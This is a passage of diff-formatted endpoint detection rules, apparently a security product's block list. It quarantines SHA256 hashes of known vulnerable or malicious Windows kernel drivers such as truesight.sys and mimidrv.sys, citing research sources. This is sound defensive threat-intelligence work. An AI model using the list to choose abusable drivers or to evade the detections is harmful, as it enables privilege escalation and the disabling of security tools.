+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a94391d-4bbf-5088-ae88-b0e45473c4f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815669Z",
+ "creation_date": "2026-03-23T11:45:30.815672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da5e27b18d3c1403975a8e17431242f208621348264ebe770db8b07813a1a0f8",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a960e0b-d246-5b2a-9ac1-644b51975102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142921Z",
+ "creation_date": "2026-03-23T11:45:32.142923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d345b048fabc9d2013358fb20fca0eb441909129f1d81965eadad8c7f812886",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a982306-2b98-5ef4-8cde-8bbac05ae82c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826567Z",
+ "creation_date": "2026-03-23T11:45:30.826569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fb3ff6c62c48b9b2e81317be4d68d8bed5d81e28ce14ea51f6a2feeabee1458",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aa5015c-7ecc-5b39-a5dd-72ab623e96f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821485Z",
+ "creation_date": "2026-03-23T11:45:31.821487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e314f9d7da2710735c800b07a22e309f795afce2de1f71a36e252b2ab71dad1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ab390eb-3266-5060-a812-1fedad7c53a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147006Z",
+ "creation_date": "2026-03-23T11:45:31.147008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d75cfd37fa1c5c4f59f7873265d2874859b510ce59c311303ffe0dd918c55689",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ab84a51-526e-5bef-ad9f-90c4d3cdd0fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480713Z",
+ "creation_date": "2026-03-23T11:45:30.480715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39f137083e6c0200543e1f8d3c074f857d141bdb8c8f09338d48520537b881aa",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aba0632-aa62-595e-9c0f-77d782dbc127",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819209Z",
+ "creation_date": "2026-03-23T11:45:31.819211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e4d6ea7cdee57d72c81b114251868973ac2e5926231851daf1caecb3e5b15ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8abd4ca2-6da4-5396-ac1c-fff03b867b9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816165Z",
+ "creation_date": "2026-03-23T11:45:31.816169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0856107633a46e065859058d26e23eea2aa4453bad323f48a0bf62af6acaa9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8abe0a85-0703-5bcc-9d98-d234f28de712",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465922Z",
+ "creation_date": "2026-03-23T11:45:30.465925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7cd14c71bcac5420872c3d825ff6d4be6a86f3d6a8a584f1a756541efff858e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac01645-6457-5d22-a393-5944070dd3c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606830Z",
+ "creation_date": "2026-03-23T11:45:29.606832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab5324c992c7547020f85de3456516e0dba2c3c5aab10371723a96188354abaf",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac7d3aa-f903-5b09-8dc7-f138725e5e70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492373Z",
+ "creation_date": "2026-03-23T11:45:31.492375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d94f2972957609972a179181b481a4bbe87dc9d8853444f10e3819c1919cc80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac8c0f3-b99d-5301-989d-08bad2a206ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143559Z",
+ "creation_date": "2026-03-23T11:45:32.143561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff55c1f308a5694eb66a3e9ba326266c826c5341c44958831a7a59a23ed5ecc8",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ad313a7-b2b4-5487-a45a-8353c5644239",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827434Z",
+ "creation_date": "2026-03-23T11:45:30.827436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30f2147f48858f5aeaf2358a439e2467e47a9b4a57ccb72e0d4bb58d5cdecad9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ada037c-3088-5bec-9956-e56969017d89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613118Z",
+ "creation_date": "2026-03-23T11:45:29.613120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f85784fa8e7a7ec86cb3fe76435802f6bb82256e1824ed7b5d61bf075f054573",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8adc5bf7-282f-581a-b1ec-7622aac46407",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815366Z",
+ "creation_date": "2026-03-23T11:45:31.815368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cac2b6e639f3ab5b42d228b161029c913284e7f41125783a96b2d6a71be507e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8adda29f-0bf5-5939-92b2-555af963cbce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815960Z",
+ "creation_date": "2026-03-23T11:45:31.815964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d58d5b56dcfd39a9970384520386a56e2a0a4fdbbccfb6706cebffabe97ac54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ade8aa3-d152-5bac-8bbc-a4f4c31bdb99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483095Z",
+ "creation_date": "2026-03-23T11:45:31.483099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e57d77d3948703c9efba0b62151548cae781a708c517e20060a48caa3960a354",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ae8a1c5-18ab-5be0-8b68-729a5eb2802e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815160Z",
+ "creation_date": "2026-03-23T11:45:31.815162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5fe73351a6765fef5d095693d15ddebb13d95de901843a03f5596adc7a00656",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ae9baf4-1c06-5888-87d0-803c7688728f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151055Z",
+ "creation_date": "2026-03-23T11:45:31.151057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "648f2aa5ed1671df0af786521e15619d0979753752197df4c79f83af69a4b1d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aea0465-7cf9-5b4d-9e65-45b03e11a403",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973006Z",
+ "creation_date": "2026-03-23T11:45:29.973008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f68ca89910ebe9da3d02ec82d935de1814d79c44f36cd30ea02fa49ae488f00",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aee5b3f-8622-54fb-9e42-a03520ef8a83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452678Z",
+ "creation_date": "2026-03-23T11:45:30.452682Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18b12a09448244180344d7e5f8028a0ca53ca0f3bddfec06d00f995619c3fc0b",
+ "comment": "Vulnerable Kernel Driver (aka mapmom.sys) [https://www.loldrivers.io/drivers/cf94939a-703f-46a4-917b-d6af7e0685ef/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8af6982c-bdc1-5b6d-b390-9fd558675d7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822007Z",
+ "creation_date": "2026-03-23T11:45:31.822010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ea0e67e8e4b6b5f5b56205dcb965e6fa99515ac03063ba8313078d8183a40f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8af73424-cabd-5273-b142-1734b1585b28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
